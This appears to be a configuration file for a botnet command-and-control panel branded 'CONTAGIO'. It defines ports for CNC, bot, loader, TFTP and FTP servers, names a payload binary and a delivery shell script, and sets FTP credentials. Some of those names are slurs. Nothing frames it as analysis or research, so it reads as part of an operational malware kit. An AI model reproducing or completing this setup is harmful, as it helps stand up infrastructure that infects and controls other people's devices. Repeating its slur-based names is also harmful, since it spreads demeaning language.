ImportTheme = "./themes/theme.toml"

CncServer = "0.0.0.0:3399"
BotServer = "0.0.0.0:1344"
LoaderServer = "0.0.0.0:12234"
TftpServer = "0.0.0.0:12345"
FtpServer = "0.0.0.0:2323"


RootLogin = "root"

RELEASE_MODE = false

[Payload]
    BinaryName = "pedo"
    ShellName = "hi.sh"
    FtpPassword = "gay"
    FtpLogin = "gay"


[Auth]
AllowAllIps = true

# MODULES

[Captcha]
    Enabled = false
    CaptchaLen = 4
    Letters = "123456789"

[Animation]
    Enabled = true
    Letters = "CONTAGIO"
    Delay = 500 # In milliseconds   

